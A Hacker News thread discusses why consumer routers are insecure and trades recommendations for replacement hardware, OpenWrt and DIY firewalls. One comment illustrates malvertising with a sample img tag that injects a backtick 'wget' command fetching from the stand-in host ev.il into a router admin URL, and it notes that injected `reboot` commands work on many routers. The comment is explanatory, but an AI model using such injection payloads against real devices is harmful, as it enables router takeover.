12 ms·
Avoid Consumer Routers
- pettycashstash2 6y agoOk I get it.... any recommendations for acceptable routers?
- cton 6y agoThese three are recommended in the security checklist [0] * Pepwave Surf SOHO * Amped Wireless RTA1750 * Synology RT1900ac [0] https://routersecurity.org/checklist.php https://routersecurity.org/checklist.php
- enz 6y agoFor fun, I'd make my own with a low-power Linux/BSD box (Atom or ARM-based). I guess performance would be totally acceptable comparing to consumer-grade routers (do we need ASIC-based routing at home anyway?)
- st_goliath 6y agoFor the full consumer router experience you should run it inside qemu-system-mips. Then it should also match up performance wise. Of course it wouldn't be complete without hacking up your own, custom Linux system calls[1], or hacking up SquashFS to be big-endian for no reason and storing your own data structures in the compressor options[2]. [1] https://twitter.com/RichFelker/status/1357733309737021444 https://twitter.com/RichFelker/status/1357733309737021444 [2] https://github.com/plougher/squashfs-tools/issues/108 https://github.com/plougher/squashfs-tools/issues/108
- LeonM 6y agoI've had good success with Ubiquity edgerouters
- pridkett 6y agoI started thinking this route. 12 months and $2000 later I ended up with a 15U rack in my basement, Ethernet drops in most of my rooms, wifi that blankets my home and yard, 4K security cameras, and more. Contrary to what you might read from a vocal minority on Reddit, my UDM-PRO has been solid. It was a great investment for the work from home era. Not saying it wasn’t worth it - it’s a huge step up in reliability from what I had, but I kinda feel like an EdgeRouter is a gateway into the wider Ubiquiti ecosystem.
- overscore 6y agoI currently have Ubiquiti gear, bought about five years ago, and my APs are already EOL for a couple of years. They don't seem like a great choice for medium-term or long-term installations for this reason. They also don't seem to publish EOL or support timelines, or commit to supporting equipment for any term (as far as I can find - I'd love to see a support schedule if anyone know it).
- jaywalk 6y agoOn the flip side, the UAP-AC-PRO access point that I bought 5+ years ago is still supported and receiving updates to this day. And that's the case for the majority of their access points. Glancing at their documentation, it seems that they've only EOLed the three early 802.11ac access points they released. Of course that doesn't help you or make your concern any less valid, but it's not like they're in the business of just willy-nilly cutting off support for their products. The one you bought just happened to fall into an unfortunate minority.
- tyingq 6y agoThe author of the article has some suggestions here: https://www.michaelhorowitz.com/second.router.for.wfh.php https://www.michaelhorowitz.com/second.router.for.wfh.php and here: https://routersecurity.org/checklist.php https://routersecurity.org/checklist.php
- gruez 6y agoMany of the items on the checklist are questionable. eg. >Can the wireless network(s) be scheduled to turn off at night and then back on in the morning? This seems almost tin-foil hat level security. Nobody is wardriving at 3am and hacking into your wifi. >Is it limited to one logon at a time? It should be. The router should not allow multiple computers to logon at the same time using the same userid. How does this improve security? I guess you can use it to catch an attacker on the rare chance that they get access at the same time you're on the admin page, but that's not really worth considering. >Can the userid for the web interface be changed? Every router lets you change the password, a few let you also change the userid. This is most important when using Remote Administration. An October 2016 study of 12,000 home routers by ESET found that "admin" was the userid "in most cases." What's wrong with "admin" with a secure password?
- tyingq 6y agoI agree that the author seems over the top. I do think "one logon at a time" might be a good idea, just not for security reasons. I suspect these routers don't do well with concurrent updates. Changing the admin id would have the benefit of culling out noise. An unsuccessful login attempt to "myuniqueadmin" catches your attention as something meaningful.
- mikestew 6y agoI work on a product that allows "one user at a time". It's not a security issue, it's a "don't want to maintain a multi-user database for extremely small benefit" issue. There's no good reason to have multiple folks futzing with this thing's configuration, just like there's no good reason to have multiple folks futzing on your router. Most of the time my product or your router sits in an out-of-the-way place gathering dust, multi-user access is a laughably infrequent use case. Now why the author calls this out is anyone's guess. Sometimes someone sees a product like what I work on, sees single-user, assumes "aha! Better security!" No, we're just lazy. If there's any additional security, that's gravy and not a design decision.
- Poiesis 6y agoWhen this article says "router" it means "combination router and wireless access point". Which is fine—that's how most people think of these products—but they are available separately. For my home, using Ubiquiti products has worked well. I have the EdgeRouter Lite and UAP-AC-PRO access points which support POE. It's been nice using products designed for professionals, and it's nice to be able to administer and upgrade the router independently from the access point. These products just work, and there's none of this dodgy "reboot the router" nonsense. I hear a lot of good things about the many mesh networking setups (often combined routers/APs) now on the market but haven't tried any. They're almost certainly a better fit for a consumer who doesn't want to be a network admin. Ubiquiti has one (the "Alien"), and the Eero (now owned by Amazon) is often recommended.
- jaywalk 6y agoI've got a UniFi Dream Machine Pro and a UAP-AC-PRO, and it's everything I could ever need or want in a home network. I had an EdgeRouter X before the UDM Pro, which was also very nice but definitely lacked a lot polish and also just couldn't provide the full speed of my Internet connection (600mbps). My parents have Eero, and it's definitely a really nice system that Just Works. Exactly as you described it, perfect for a consumer that wants quality without having to be a network admin.
- bogwog 6y agoI recently rebuilt my home network when switching ISPs and fell in love with Ubiquity. It's the first time I have ever been happy to use networking-related hardware. Dealing with Asus/Linksys/Netgear/etc in the past had always been a miserable experience, and I'd cringe every time my internet went out and was forced to deal with them again. It's a shame that there aren't more "pro-sumer" products like this out there. A common warning I read when researching Ubiquity products was that they're not for people who aren't tech/networking professionals. I don't know where that came from, because setting it all up was a breeze. It was way easier than dealing with Asus's terrible "setup wizard".
- KozmoNau7 6y ago>"It's a shame that there aren't more "pro-sumer" products like this out there" Mikrotik is another company that has a good pro-sumer to pro ecosystem. Routers, APs, adapters, long-range point-to-point radio stuff. Most of their gear runs on variations of their RouterBOARD hardware and Linux-based RouterOS, and can be collectively managed through CAPsMAN, which can either run on one of their routers or on a desktop PC. The configuration side is definitely less slick than what you get with Unifi, on the other hand you can configure everything in detail. You get an astounding amount of possibilities for your money, if you can accept the late-90s/early-2000s style web interface or just use the terminal interface instead. The only thing I've found lacking is that they don't have any 4x4 or 802.11ax access points yet, but if you go modular (separate router, switch and AP), you can upgrade piecemeal when you need to.
- 3np 6y agoPCEngines APU for DIY, or Mikrotik for a provided solution. If you need more ports or throughput, extend with a dedicated switch. Any stupid unmanaged switch is good enough for most SOHO use-cases, unless you want to get serious with segmenting your network with VLANs and ACLs. As for what DIY OS/dist, I have used VyOS, IPFire, pfSense, OPNSense, and a handful of various xx-WRT derivatives. OpenWrt is still my recommendation without a doubt. I'm still not at all a fan of the update and package management of OpenWRT, but it's the best out there unless you configure a vanilla debian install yourself. Keep WiFi APs as separate devices, regardless of if you mesh or not.
- candiddevmike 6y agoSlap Linux on an old desktop, buy a 4 port PCI NIC, setup nftables/dnsmasq, and as a bonus become addicted to self hosting.
- adrianN 6y agoThat replaces a 5-10W device with a 100W device. I wouldn't want that, that's 566kg of extra CO2 per year with the US power mix.
- PhantomGremlin 6y ago1 Watt continuous is $1 per year, as a typical USA rule of thumb (at $0.12 per kWh). Places like California are a lot more expensive. So yeah, it's pretty expensive on an ongoing basis to convert an old desktop to a router. I must confess, I run an OpenBSD firewall on an old Dell server. Fortunately the Intel CPU doesn't need to do much. So I'm only drawing about 70 W continuous. I keep meaning to replace it with something more power efficient but haven't.
- olavgg 6y agoOn Ebay you can find Dell R210 ii with Ivy Bridge CPU for 150 USD. These idles at 25watt, and are super quiet and small. I have not tested the R220 with Haswell, but I guess idle watt usage is less than 20watt as Haswell had much improved power efficiency when idling.
- tomxor 6y agoI think you can swap "old desktop" for some smaller new power efficient mini desktop, which at idle (for basic home needs lets face it it's pretty close to idle) it's likely to draw way under it's max... but if you are so carbon conscious consider the total environmental cost, buying new shit (new mini desktop or consumer routers) that constantly needs replacing incurs a carbon cost through consumption that people rarely try to quantify because it's not so easy - but it's often still very big. Saving an old PC from the rubbish is free of this cost, it not only saves manufacturing carbon cost but environmental pollution.
- Tajnymag 6y agoTurris?
- joerandom 6y agoMikroTik hAP ac2 (RBD52G-5HacD2HnD-TC) - all you need and then some for fair price.
- Jnr 6y agoStill using the hAP ac that I ordered 5 years ago and it works great. After some time I needed more ports, so I added Mikrotik switch in the mix that gets powered by hAP ac PoE out port. Great hardware and great software at low prices.
- hyperbovine 6y agoMikroTik hardware is nice but that company has a serious case of nih syndrome. This manifests as a lot of cryptic, undocumented commands plus the occasional showstopper exploit (eg https://nvd.nist.gov/vuln/detail/CVE-2020-13118 https://nvd.nist.gov/vuln/detail/CVE-2020-13118). As an added benefit, they have a cult of online followers who are all too happy to deride anyone who points these (and other) flaws out as a clueless nontechnical moron. Fwiw I'm transmitting this through one of their routers.
- fleg 6y agoIs Mikrotik Router Monitoring System an actual MikroTik software, or is third party open source project? Doesn't seem to be provided by MikroTik: https://github.com/adeoluwa-adebiyi/Mikrotik-Router-Monitoring-System https://github.com/adeoluwa-adebiyi/Mikrotik-Router-Monitori...
- kardianos 6y agoThat CVE is for third party software. But this brings up a good point. It has a good API surface you can plug into in many ways. There have been some CVEs, but all the exploits I'm aware of already had patches and were only exploitable for un-updated models. I honestly don't know what you mean by not invented here. They did create a wireless protocol for point-to-point products with some advantages for those who opt into it, but that's the only thing I can think of. Sometimes their documentation is lacking, but generally their docs are very good.
- 6y ago
- rkachowski 6y agoThe majority of the points tend to be based on the facts that the firmware is shit, isn't updated for long, and visibility into the firmware and it's releases is murky and opaque. So what if you wipe out the firmware and go for openwrt? how does balancing for compatibility with openwrt and consumer router hardware rank on this scale?
- aritmo 6y agoOpenWRT support does not come free. There are volunteers that need to spend lots of their personal time so that a consumer router may get reasonably good support in OpenWRT. Whole range of chipsets with no free software support are immediately excluded from OpenWRT.
- msla 6y ago> Whole range of chipsets with no free software support are immediately excluded from OpenWRT. True, but it reminds me of where printer support used to be in Linux, say, 20 years ago: Lots of shitty printers weren't supported. Sometimes, yeah, that's a deal-breaker, but if you're in a position where you can buy one, plenty of good hardware is fully supported.
- wtallis 6y agoGPUs are a much better analogy than printers. Broadcom WiFi occupies the same status as Nvidia GPUs: #1 in the market, hostile to open source, but their main competitors work fine on Linux without the hassle of closed-source driver blobs.
- random_upvoter 6y agoI was in the market for a home router a couple of months ago and I was astonished that 200-300 euro is now considered "mid-range" for a wireless router.
- TheGuyWhoCodes 6y agoYes some are really atrocious, dlink come to mind. Some are better, the high end gaming routers by Asus actually have good support but just like phones they have a limited shelf life... One thing I tried to find but couldn't is stand alone modems, most routers today don't come with a modem and you have to use the shitty one given to you by your ISP in bridge mode, I'm not sure about the risk of compromised bridge mode router to infect down to the router given it's "secured" but it's still can be a bot in a botnet.
- c0l0 6y agoPersonally, I would never buy SoHo networking hardware that does not have decent OpenWrt support - the platform is supremely flexible, hackable, and secure. If you're in the market for a new device, look at https://openwrt.org/toh/views/toh_available_16128 https://openwrt.org/toh/views/toh_available_16128 as a first step (and avoid devices with Broadcom's involvement).
- 3np 6y agoPCEngines APUs are great router devices to put whatever you want on, including OpenWRT. Proper Intel NICs (Realtek is not great for routers) for cheap. https://pcengines.ch/apu2.htm https://pcengines.ch/apu2.htm I'd also strongly suggest to have router and access points as separate physical devices. A great step up for someone with an AIO consumer router/WiFi AP would be to get something like that as a router, flash OpenWRT on the old router and transform it into a "dumb" access point.
- Haemm0r 6y agoCan confirm that. I run an apu1c4 with pfsense on it behind the isp modem(in single user mode) for multiple years now. No issues so far :)
- c0l0 6y agoI bought an x86 box from China with 6x Intel i210 GbE NICs onboard a few weeks back and reviewed it here: https://johannes.truschnigg.info/reviews/2021-01_fwbox/ https://johannes.truschnigg.info/reviews/2021-01_fwbox/ It's my favorite OpenWrt router so far, and I've owned quite a few since I started using it on a WRT54G :)
- 3np 6y agoThanks for writing about it - I was actually close to pulling the trigger on another of their boxes a few moons back, great to hear it's good in practice as well :) (...Personally I avoid Intel CPUs best I can, though. AMD's ME equivalent on the APU can actually be disabled, which happens to be something I care about for something like router)
- antattack 6y agoActually, consumer router running openWRT is quite good[1] or Asus WIFI router using Merlin firmware[1]. [1]https://openwrt.org/supported_devices https://openwrt.org/supported_devices [2]https://www.asuswrt-merlin.net/download https://www.asuswrt-merlin.net/download
- enlyth 6y ago+1 for Merlin, I use it in a household of four people for QoS and it's great!
- stinkytaco 6y agoIsn't Merlin just the Asus firmware with some additional features? From a security perspective it does not seem like an upgrade since it still includes many proprietary Asus blobs.
- gruez 6y agoHow much does the "proprietary blobs" matter, for something like a router? It sort of makes sense a cellphone where there's basically a parallel operating system running in the baseband, but that doesn't really apply for a router. The biggest threat is probably out of date services, but AFAIK most of those (eg. dnsmasq) are open source and are kept up to date.
- genpfault 6y agoDepending on the router, a whole bunch: I had an ASUS router that could only maintain about 150-200 Mbps of NAT traffic using the CPU whereas with the magic cut-through blobs it could do a full 1 Gbps.
- bubblethink 6y agoThe kernel is stuck on whatever version it shipped with. A lot of routers use the long obsolete 2.x kernel.
- 6y ago
- lukeh 6y agoI like the Juniper SRX series, BSD-based and find the configuration syntax (mostly) very logical. But, no WiFi (I use Ubiquiti for that).
- kazen44 6y agovery solid aswell. mind you even a basic srx is complete overkill for a home environment. it is very solid hardware with good support. I would however, not recommend getting one for home use unless your employer runs juniper and can get you the update packages, getting them without a license is difficult.
- AzzieElbab 6y agoHow exactly would I go about avoiding consumer routers when every provider in my area forces me to get some kind of modem with built in router and wifi?
- imglorp 6y agoYou can treat the ISP's router as bare, hostile internet and put the router of choice behind it. Disable their WIFI if you can, but don't use it. Plug an ethernet cable from your router's WAN port to one of the ISP router's LAN ports. Your router's WAN side will get one DHCP address from the ISP's router. Your LAN side and firewall rules are however you like them, on your router. This whole thing is called "double NAT-ing" -- search for that term for a how to guide.
- XelNika 6y agoA lot of ISP routers have the option to disable everything except the modem, often called "bridge mode". Avoids double NAT.
- jorvi 6y agoYou can also call your ISP to put the modem-router in bridge mode. This will basically turn off all of its features and just have it pipe internet access from its LAN ports. If you do this, remember to go ISP router LAN port > personal router WAN port, as you won't be protected by the ISP router firewall anymore.
- AzzieElbab 6y agoGood suggestions. Thank you. I have done something similar before. Only problem is, I had to revert the setup each time isp had hiccups otherwise they refused to provide any support
- goatinaboat 6y agoHow exactly would I go about avoiding consumer routers when every provider in my area forces me to get some kind of modem with built in router and wifi? It is a ridiculous situation, but I actually have our provider-provided router connected straight into a real firewall, and that in turn connected to a switch which in turn has the wifi base stations connected to it. This means that if the first router is compromised there is a chance it won't penetrate the household, but of course the first router could still be used e.g. as part of a botnet by an attacker.
- DrBazza 6y agoWhat's the tl;dr? Buy any router, but replace its software with dd-wrt or openwrt?
- megraf 6y agoNot exactly. It's worth the read, it's about 7 min. :)
- froh 6y agois the Fritzbox available in the us? it's an excellent security maintained choice in europe, for combined cable or dsl modem, router, wifi access point, nas device, phone switch and voice mail box.
- LaGrange 6y agoIt's AVM, so it's specifically mentioned in the article for _not_ being available in the US. And yes, I've been using Fritzboxes (upgraded in 2017 for better wifi, to another Fritzbox) since 2011, and it: * reliably auto-updates, * has the best built-in software I've seen (no OpenWRT, but nothing that would motivate me to install OpenWRT) * has been getting updates for many years. It's not the prettiest, nor does it go for (my preferred) rack-mounted look, but it works and it lives in a broom closet anyway.
- ofrzeta 6y agoAlso you can run Freetz, a way to extend (not replace) the router software. It has enabled me to run mDNS for split DHCP.
- littlecranky67 6y agosecond this - get a Fritzbox whenever possible. Stable, very long updates (even newer features) and easy to use. They seem pricy, but longevity will make up for that.
- bayindirh 6y agoSimple question: What if my space at home doesn't allow for a half rack of equipment and required cabling? OpenWRT is no panacea. It generally doesn't support higher throughput modes in wireless radios in said routers and I need these features (thick walls, wifi first devices, etc.).
- Normal_gaussian 6y ago17 shows the author considers higher end routers, like the ubiquiti unifi routers, are not in this class. I bought unifi specifically because I wanted some professional features (proper in house roaming, wifi bridge, and VLANs) but live in a rented house where I cannot carve out some decent rack space or channel the walls.
- michaelt 6y agoYou should consider something from MikroTik's home-and-office range - I use the hAP ac² which I've been happy with. The software is worlds apart from any consumer router I've had before. The only downside is the number of settings is intimidatingly large, which might make it a poor choice for gifting to your less tech-savvy loved ones.
- iagovar 6y agoMikrotiks are not user friendly though. If you don't know at least a bit of networking it can be difficult to set up. There's no better bang for the buck, that's true.
- glogla 6y agoAlso, Mikrotiks are behind even mid-range consumer devices in Wifi. You can get 4x4 ax wifi from Asus and it's going to work great. Mikrotiks are very stable and reliable but not that fast. Of course, it depends on speed of your internet connection. You don't need 4x4 wifi if you have 100 mbps internet, but it's kind of annoying to pay for 500 mbps cable (because they don't offer anything slower) and be bottlenecked by wifi.
- 6y ago
- yetihehe 6y agoI have a rule of thumb, which didn't fail me yet - don't buy fancy looking networking gear. Buy the ones which look like ugly military tech (not fancy military tech) or something you could see in a factory. I have two failed fancy wifi routers, two failed good-looking switches, but one wrt54-gl still working and two metal-cased 5/8 port switches which are older but still working. With fancy looking gear, while it worked, there were always stability problems.
- oaiey 6y agoUbiquiti Unifi is exactly in that spot. Looking Apple like good and considered business/professional (at least in this article .. we all know they have their problems). Generally, I completely agree with you. The high-end products do not look fancy normally.
- giobox 6y agoFor now... The stories of firing most of the US dev team in San Jose last year to outsource to cheap foreign dev teams and new product pushes like this bizarre frontrow life cam thing give me a lot of concern for the future of Ubiquiti. The past 3-4 years to this point were pretty great product-wise though. I'm pretty heavily invested in the Unifi ecosystem but have already started keeping an eye on the good stuff competitors like Mikrotik etc are making. > https://www.frontrow.com/ https://www.frontrow.com/
- linsomniac 6y agoI dunno, I'm in the process of replacing all my Ubiquiti gear, because: - A firmware upgrade to my switch last year enabled some sort of loop detection that would shut off ports that my Google WiFi mesh was connected to (Ethernet backhaul). Support was nice, but ultimately unable to disable that new feature of the firmware. - My original camera NVR was flaky, possibly because of camera flakiness, partly also because it just couldn't keep up with 4 cameras. - Replaced NVR with CloudKey Gen 2, which was fairly nice but then brought the camera flakiness into full view. I would spend DAYS every quarter messing around with rebooting cameras to get them to reassociate with the Unifi Protect server. - A recent firmware update to the cameras left 4 out of 5 of them totally dead, unable to even be pinged, let alone associating with the Protect server. On the plus side, the Unifi Protect mobile app is easily best in breed. Light years ahead of ReoLink or Hikvision or Montavue (I've played with all of them recently). The BlueIris mobile app seems to be pretty crappy, but I haven't shelled out the money to actually try it (based on the reviews). I've replaced the switch with ebayed Enterprise gear, Aruba S2500 for <$100. Harder to set up, but did have enough knobs to disable the loop detection. A great PoE switch, plus it has 10Gb ports. The cameras I've replace with MontaVue 4K cameras, which are amazing in low light. 10x the sensitivity of most other cameras in low light. I also got their DVR, which is ... meh. The mobile app is basically unusable for anything other than live view. The DVR is probably fine if you use it from a keyboard/monitor, but this is for my house and we really want a good mobile app, not some silly console. The cameras though! <chefs kiss>
- spaceribs 6y agoDoes the AmpliFi fit into this category? I got an Instant a while back and while it's not super tweakable, it's been incredibly stable and easy to use.
- paulcarroty 6y agoAgree as OpenWrt user. > "Linksys is by no means alone in using its customers as beta testers No sure, but my Linksys router starts painfully slow and kinda 10x faster on OpenWrt. Crazy slow for dual-core machine. Maybe it's the part of their plans to force clients for buying new routers?
- api 6y agoAssume the physical network is insecure. The only exceptions might be secure backplane networks carefully configured and isolated, but these are basically data busses for clustered computing.
- dsr_ 6y agoMy stock Debian x86 mini-ITX firewall is now 7 years old. It has been upgraded across three stable releases and will go to bullseye sometime this year. It handles stateful firewalling, IPv6 routing, failover DHCP, DNS caching, NTP... and it has lots of available capacity in CPU and RAM. It was expensive for a home firewall but not horribly so, and I fully expect it to have a ten or twelve year lifespan with full support. If the NIC fails, I can replace it -- it's a PCIe card. If the storage fails, I can replace it -- SATA SSD. Neither of those have happened yet, but I might replace a fan sometime soon. These days I would probably buy a tiny NUC-like object with enough gig-e ports.
- mxuribe 6y agoI've often thought about doing something like this over the years...but the enthusiasm (if that's the right thing that i feel) often wears away, when i'm just sitting down after a very long, hard day of work to watch netflix...and then "the internet is down". Clearly i have no experience doing what you described, and my fear of added maintenance might be inaccurate...but i do wonder if this is better in the long run. Do you find that such an approach creates lots more maintenance work for you?
- simplyaccont 6y agoI been running similar setups for past 20 years or so. It's as much maintenance as you want it to be after initial configuration
- mxuribe 6y agoThat's a long time; thanks!
- simplyaccont 6y agosure. i am now on 4th iteration of gateway (setting it up now). first one died (early 2000s.) second couldn't deal with 120mbit adsl speed. third had 2 mini-pcie cards inside to server as AP. for past couple of years tried edgerouter-x flashed with openwrt, but it was... "not it" (selection of packages is vast, yet limited) so i went back to x86 based one. one interesting side effect, is that much talked about bufferbloat disappeared after i switched to it from edgerouter, even without any queue management (have 1gb cable at home).
- motiejus 6y agoCurious why nobody mentioned Turris series - they provide consumer routers with OpenWRT, and with upgrades.
- swiley 6y agoConsumer electronics are pretty much all bad. Usually the software devices are shipped with is poorly designed at best (it needs to look nice to sell, ergonomics don't matter) and pathologically user hostile at worst (smartphones and PCs.)
- kardianos 6y agoMikrotik is doing better at offering home router solutions. They now have a quick-setup page and an Android application that makes it much easier to configure. Just got a new Mikrotik RBwAPG-5HacD2HnD that has a quad core ARM CPU, dual chain, dual band wifi. Highly recommended.
- tuatoru 6y ago> Just got a new Mikrotik RBwAPG-5HacD2HnD That's a wireless access point, not a router. Different animal. For WAPs, I'm waiting for 802.11ax/bd to be more reasonably priced. In the mean time, it's wires for me.
- kardianos 6y agoIt is a router and WAP. It has two Ethernet ports, one for WAN, one for LAN, both Gigabit. It also has an integrated WAP. You can of course use it just as a WAP, but yes, the default configuration is a router. It can be used indoor and outdoor, it has PoE if desired and mounting brackets. But yes, it is a router in the default configuration.
- d00bianista 6y agoI'd dare bet that the WiFi-radio and 1000BASE-T -ports are indeed not switched, but connected to the CPU, which as stated above looks very much like a router :) There's sadly no block diagram released for these, which would document the internal topology. I also do not have this exact device anywhere to look this up from.
- MrDOS 6y agoThe capabilities of MikroTik devices are kind of inscrutable to those who have never put hands on them. Yes, they can route (in software). Yes, they can switch (in hardware, across most ports, depending on where they attached the switch controller chip). _All of them_. Some will be faster at some things than others, but by and large, all MikroTik devices have approximately the same capabilities (at potentially vastly different levels of performance, but checking the same boxes nonetheless). The key difference between different models are the physical interfaces (number and characteristics of the Ethernet ports, SFP ports, wireless radios). At a software level, RouterOS is basically just Linux with a consolidated and more consistent management interface.
- tonetheman 6y agoI like this little thing: https://shop.netgate.com/products/1100-pfsense https://shop.netgate.com/products/1100-pfsense Nice little pfsense box.
- timw4mail 6y agoMy favorite solution is a thin-client class computer with opnSense, and a Ubiquiti Wifi Access Point. I have used a Ubiquiti router, but find opnSense easier to use.
- matheusmoreira 6y agoUsed to be easier in the DSL days. Hardware was easy to find. Then my ISP switched to VDSL and it became almost impossible to find better routers. Now I have a fiber link and the ISP's router is so bad but I don't really know if I can just buy a better one and connect the fiber to it. I've been told ISPs have remote access to the router and can update it remotely and deny access if it's been tampered with. It's probably a wise decision to avoid consumer products in general but it's becoming harder every year.
- cr3ative 6y agoThere are plenty of VDSL modems which can be interfaced with a router of your choice.
- matheusmoreira 6y agoI couldn't find any years ago. Perhaps the situation has improved by now.
- timbit42 6y agoDoes your ISP router have DMZ hosting, where you can forward all packets at layer 2 or 3 to your own router behind it?
- AshamedCaptain 6y agoWhat would be the advantage of that? Unless you "own router" is basically VPNing everything past the ISP router? In which case it's not really clear why you need the "own router" part...
- ruph123 6y agoWhat are people’s thoughts about the Turris Omnia[0]? Does it hold up to their claims and is it playing nice with American ISPs like charter? [0]: https://www.turris.com/en/omnia/overview/ https://www.turris.com/en/omnia/overview/
- cameronhowe 6y agoI have a turris omina. I have no real complaints. It is way better than any other router I've owned. It is the only one I've felt comfortable to do anything fancy with. I currently have mumble and a nextcloud server running on the router, and a wireguard interface. I can't comment on any US ISP weirdness as I live in europe.
- ruph123 6y agoGreat to hear! I love the ability to swap out wifi cards or even insert a wan module. Great it wifi cannot be trusted as a fallback.
- mkup 6y agoI own Turris Omnia from 2019, it works flawlessly, recently added LTE card for backup connectivity.
- justaj 6y agoI like the hardware but I don't like the default software that's on it. NIC.CZ is already spread too thin and I get the feeling that they are not prioritizing their router branch on the level it should be. I'm considering running Alpine on it but so far that's pretty much uncharted territory.
- von_tenia 6y agoI'm using a 7 years old TP-Link router wifi, the last official firmware available is from 2018. I disabled features like remote administration and file-sharing. I also setup WPA2, disabled WPS and have a strong password on the admin. What is the real risk for me? I get that it is always preferable to have an up to date device for security but I also wish to not create more electronic waste (and I unfortunately have stability issues with OpenWRT). From my understanding cracking a WPA2 passphrase isn't as easy as it used to be with WPA1 or WEP, and not having the admin interface exposed to the outside world limit the risk of someone breaking in. So realistically, assuming I'm not targeted by some APT group, would breaking into my router be that easy?
- jeroenhd 6y agoIt depends. If there's a vulnerability in the firmware that allows unauthenticated code execution from a generic GET request, malvertising on your computer could load an IMG tag with the SRC set to your router's IP and deploy malware to your router. From there your router could become part of a botnet, the router's DNS settings could be changed to redirect websites through some malvertising DNS server, and whatever the router can access in your network (dev database server?) could be extracted. Sometimes all it takes is an <img src="http://10.1.1.1/admin/getSettings?command=`wget http://10.1.1.1/admin/getSettings?command=`wget http://ev.il/|curl http://ev.il/|curl`" /> in an ad. Such vulnerabilities are more common than most vendors would like to admit. Adding `reboot` to random GET requests gets you quite far with quite a lot of consumer routers. I have little experience with TP Link software outside of flashing OpenWRT on their hardware. There's been already scanners that target specific ISP routers for specific ISPs in specific countries already. In practice the probability of getting hit like this is very low, but the risk is still there. With four years of updates, TP Link might actually care enough about security to not allow trivial exploits to execute code on their routers. Many vendors I know won't update past a year or two. I'd say the risk is low to very low in practice, but I'd watch out with running sensitive services (if you're in a healthcare startup, for example) while working from home.
- UI_at_80x24 6y agoYes, but; Consumer routers all have security holes that can be exploited even when you do everything correctly like you did. https://www.cvedetails.com/vulnerability-list/vendor_id-11936/Tp-link.html https://www.cvedetails.com/vulnerability-list/vendor_id-1193... Looking at this one: TP-Link TL-WR940N is vulnerable to a stack-based buffer overflow, caused by improper bounds checking by the ipAddrDispose function. By sending specially crafted ICMP echo request packets, a remote authenticated attacker could overflow a buffer and execute arbitrary code on the system with elevated privileges. Your only safe(ish) bet is to build your own, and hope that Linux/BSD close all the exploits that get discovered.
- pharmakom 6y agoApple, you are missed in this space.
- Chris_Newton 6y agoAs someone who has worked on firmware for network devices, including the UI/presentation aspect, I feel obliged to point out that there are people working in that part of the industry who take security seriously, and likewise there are people working in that part of the industry who take the presentation of both hardware and UIs seriously. At the same time, I can’t really disagree with the general sentiment that a lot of firmware in embedded devices, router or otherwise, is very poor. The thing I’d add is that it’s not just consumer-grade products with this problem, there are plenty of supposedly professional-grade devices where the firmware is junk too. The worst products I have ever had in my typical small-office work environments were the Cisco-branded “small business” range, which in specs and appearance did look like they were being pitched at that market, yet which never performed accordingly and mostly failed after an unreasonably short amount of time for equipment in this class. To be blunt, a big part of the problem is money. Think about the kind of developer who has gained a few years of experience and has the skills and interest to do a good job solving challenging technical problems. Look at what that person can earn working for a FAANG or a financial services firm, or the potential upside for them at a startup if they get in early and there is a big exit. Look at the work environments they have in those roles. Now look at what a whole team of those people would earn collectively for writing router firmware and tell me which number is bigger, and look at their work environment and tell me where you’d rather be spending a significant fraction of your waking hours. In short, the people you find working in this area with real ability tend to be those who enjoy this kind of work enough to give up a lot of other benefits to do it. Obviously that restricts your talent pool and then manufacturers have to fill the gaps with whoever else they can find. It comes down to the age-old reality that many customers prefer to buy junk as long as it’s cheap. Sadly, I doubt this will change any time soon, whether we’re talking about consumer routers or TVs or whatever IoT device someone decided would make their home smarter this week. Maybe if something really bad happens, the market will shift and/or governments will step in and regulate to try to force better standards for things like security and updates. In those cases, I would expect to see both significant consolidation in the consumer devices market and significant price increases follow quickly afterwards.
- AndyMcConachie 6y agoI mostly agree with your post. However, I must point out that some people get paid _very_ well to write router firmware. Just maybe not consumer grade router firmware. Where the margins are high on the hardware, typically the salaries are as well.
- sfjailbird 6y agoIf I disable wifi on the shitty router my ISP gave me, and assuming the physical device is secure, am I safe from having my home network hacked into? I assume the ISP could still backdoor their way in (is this likely?) but that is a separate concern.
- geocrasher 6y agoThis depends completely on what you put AFTER the router that your ISP gave you. You can often get your ISP to put the router into Gateway mode which turns off the routing part and the wifi. It becomes just a modem at that point, and you can use whatever good router you want.
- amelius 6y agoYou can also use this as plausible deniability when you get raided by the police and they discover your collection of pirated music.
- yabones 6y agoThe state of all network firewalls/routers is appalling. Even high end Cisco, Fortinet, or even Palo Alto gear is riddled with security issues, critically outdated packages, and general poor maintenance. IMO, the only way to have a reasonably secure device is to build it yourself. That's not going to be a popular opinion where the prevailing motto is "nobody gets fired for buying Cisco", but I don't really see any alternative. OpenWRT/Tomato are decent, but they still expose a web UI which is potentially a greater attack surface than ssh w/ public keys. I've seen some people have good results with OpenBSD or FreeBSD, others with skinny versions of Debian or CentOS. I took a crack at it last year on Debian (shameless plug: https://nbailey.ca/post/linux-firewall-ids/ https://nbailey.ca/post/linux-firewall-ids/), and I've been happy with it so far. It is more expensive to build, but I expect this device to last more than a decade, or until I need greater than 1gbps per port.
- nelgaard 6y agoJust uninstall the openWrt web UI then. or configure uhttpd to only listen on localhost and use a ssh proxy tunnel to access the web interface. It saves you from the hassle of self signed certs too.l
- whatupmiked 6y agoWell, if you build it yourself at least you’ll think it’s secure!
- tenebrisalietum 6y agoAbout a year ago I decided no more crappy plastic boxes as my main home router, and now use a headless Linux PC instead. No regrets and have plenty of resources to run things like ntopng and anything I need right at the edge of my home network; and QoS is something I can control as well. I don't care about the small increase in cost of electricity where I'm at. Now I do also have an Asus RT-AC56U but configured for an access point only. Which had pretty decent firmware IMHO with it's OpenWRT variant "AsusWRT"--decent because it's easy to get root without flashing it and really do what you want. With all the cloud service stuff disabled, it goes into a 2nd NIC into my PC-as-a-router and is appropriately firewalled. At least one other comment talks about getting business class hardware for Wifi and that might be a plan in the near future, but for now it's working OK for me.
- second--shift 6y agoAnother postive note here for Mikrotik - $50 USD buys you the hAP ac lite - enough for a "home" router but with all the features of top end enterprise routers. Other comments have addressed security concerns - there's lots of CVE's out there because there's lots of Mikrotiks out there. As far as I'm aware, all or nearly all CVE's are patched before they are public; there's always the risk of zerodays but everything has the risk of zerodays.
- KozmoNau7 6y agoI would go for the hAP AC or AC2, rather than the lite versions, which are specifically the low end of the range and can only route ~500Mbps and don't have 5GHz wireless. The difference in price isn't even that much, the AC2 is less than $70.
